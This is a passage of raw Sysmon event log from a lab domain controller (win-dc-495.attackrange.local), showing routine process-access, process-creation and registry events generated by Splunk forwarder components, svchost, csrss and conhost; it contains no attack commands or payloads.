13:51:46.115{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}1196C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.115{59A5CD1D-90A0-6005-2901-00000000A301}44401132C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{00000000-0000-0000-0000-000000000000}1196C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+37d14(wow64)|UNKNOWN(0000000000FC404B)|UNKNOWN(0000000000FC3CFC)|UNKNOWN(0000000000FC4CBE)|UNKNOWN(0000000000FC2444)|UNKNOWN(0000000000FC0B66)|UNKNOWN(0000000000FC054F)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+ebf6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11e50(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+17a14(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11801a(wow64) 10341000x80000000000000008970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.053{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.053{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.053{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{00000000-0000-0000-0000-000000000000}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:46.053{59A5CD1D-9272-6005-B504-00000000A301}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9273-6005-B804-00000000A301}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009007Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9273-6005-B804-00000000A301}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.990{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9273-6005-B804-00000000A301}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.991{59A5CD1D-9273-6005-B804-00000000A301}3460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000009000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:51:47.631{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda1-0x107f6e18) 10341000x80000000000000008999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.412{59A5CD1D-9273-6005-B704-00000000A301}50164580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9273-6005-B704-00000000A301}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:47.271{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 